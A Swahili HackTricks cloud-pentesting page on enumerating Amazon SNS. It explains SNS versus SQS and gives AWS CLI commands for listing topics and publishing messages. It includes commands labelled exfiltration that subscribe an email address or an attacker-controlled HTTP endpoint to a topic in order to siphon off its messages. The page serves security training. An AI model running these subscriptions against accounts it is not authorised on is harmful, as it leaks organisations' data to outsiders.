Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - SNS Enum

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

SNS

Amazon Simple Notification Service (Amazon SNS) inaelezwa kama huduma ya ujumbe iliyosimamiwa kabisa. Inasaidia aina zote za mawasiliano kutoka kwa programu hadi programu (A2A) na kutoka kwa programu hadi mtu (A2P).

Vipengele muhimu kwa mawasiliano ya A2A ni pamoja na mifumo ya kuchapisha/kusikiliza (pub/sub). Mifumo hii inaleta mada, muhimu kwa kuwezesha ujumbe wa juu wa kiasi, msukumo wa msingi, kutoka kwa wengi hadi wengi. Kipengele hiki ni cha faida sana katika mazingira yanayohusisha mifumo iliyosambazwa, huduma ndogo ndogo, na miundo ya seva inayotumia matukio. Kwa kutumia mada hizi, mifumo ya wachapishaji inaweza kusambaza ujumbe kwa ufanisi kwa aina mbalimbali za mifumo ya wasikilizaji, ikirahisisha mfano wa ujumbe wa fanout.

Tofauti na SQS

SQS ni huduma inayotegemea mkururo wa foleni ambayo inaruhusu mawasiliano ya moja kwa moja, ikisimamia ujumbe kwa mtumiaji mmoja. Inatoa utoaji wa angalau mara moja, inasaidia foleni za kawaida na za FIFO, na inaruhusu uhifadhi wa ujumbe kwa kujaribu tena na usindikaji uliocheleweshwa. Kwa upande mwingine, SNS ni huduma inayotegemea kuchapisha/kusikiliza, ikiruhusu mawasiliano ya moja kwa wengi kwa kutangaza ujumbe kwa wasikilizaji wengi kwa wakati mmoja. Inasaidia vituo mbalimbali vya usajili kama vile barua pepe, SMS, kazi za Lambda, na HTTP/HTTPS, na inatoa mifumo ya kufuta kwa utoaji wa ujumbe uliolengwa. Ingawa huduma zote mbili zinaruhusu kutenganisha kati ya vipengele katika mifumo iliyosambazwa, SQS inazingatia mawasiliano ya foleni, na SNS inasisitiza mifano ya mawasiliano ya matukio, fan-out.

Uorodheshaji

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>

Tafadhali kumbuka kwamba ikiwa mada ni aina ya FIFO, watumiaji waandikishaji wanaotumia itifaki ya SQS tu ndio wanaweza kutumika (HTTP au HTTPS hawawezi kutumika).

Pia, hata kama --topic-arn ina mkoa hakikisha unataja mkoa sahihi katika --region au utapata kosa linaloonekana kama huna ufikiaji lakini tatizo ni mkoa.

Upatikanaji usiothibitishwa

pageAWS - SNS Unauthenticated Enum

Kupandisha Hadhi

pageAWS - SNS Privesc

Baada ya Uvamizi

pageAWS - SNS Post Exploitation

Uthabiti

pageAWS - SNS Persistence

Marejeo

Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

PreviousAWS - SES EnumNextAWS - SQS Enum

Last updated